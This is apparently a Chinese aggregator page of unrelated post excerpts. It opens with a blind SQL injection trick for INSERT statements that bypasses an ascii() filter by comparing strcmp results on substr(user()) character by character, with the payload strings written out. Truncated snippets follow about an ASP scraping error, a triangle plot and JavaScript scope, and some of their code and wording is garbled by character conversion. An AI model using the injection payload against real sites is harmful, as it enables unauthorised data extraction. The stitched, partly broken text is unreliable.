在insert 注入中,極限情況下過濾了ascii,可以用這種姿勢繞過
'0'+strcmp('taichiteam',substr(user(),1,1))+'taichiteam0'+strcmp('m',substr(user(),1,1))+'taichiteam 返回1 則繼續
直到返回值依次為 1 0 -1 或者 -1 0 1 則 0 中的字元為正確值
然後繼續
0'+strcmp('z',substr(user(),2,1))+'taichiteam
by taichiteam taichi-0x1
發現乙個很詭異的問題,求大神解惑
用asp sqlserver做了乙個簡單的頁面抓取程式,實現過程就是在頁面設定乙個按鈕,開啟新視窗,新視窗的asp頁面執行如下操作 從資料庫的表中取出10萬條url記錄,然後通過serverxmlhttp抓取頁面,然後將抓取到的html內容存入對應url的資料表中。錯誤如下 但其實,要抓取的網頁完全...
乙個666的發現
記憶中應該是以前做到過這樣乙個題,關於等邊三角形的然後用matlab畫了一下,當時就震驚了,所以畫了個圖記下來,今天忽然看到這個圖,所以就發上來存著了。描述 線段邊長記為b,在邊長上擷取一段記為a,那麼有以下關係 實際上,他們兩個相差最大不超過0.05。並且假設x a b的話,有0 x 1,當x 0...
今天發現的乙個很神奇的問題,作用域的問題
var num 1 function add function con con 很明顯輸出的是2 var num 1 function add num function con con 輸出的居然是1function add num function con con 輸出的是1同理,我使用乙個物件 ...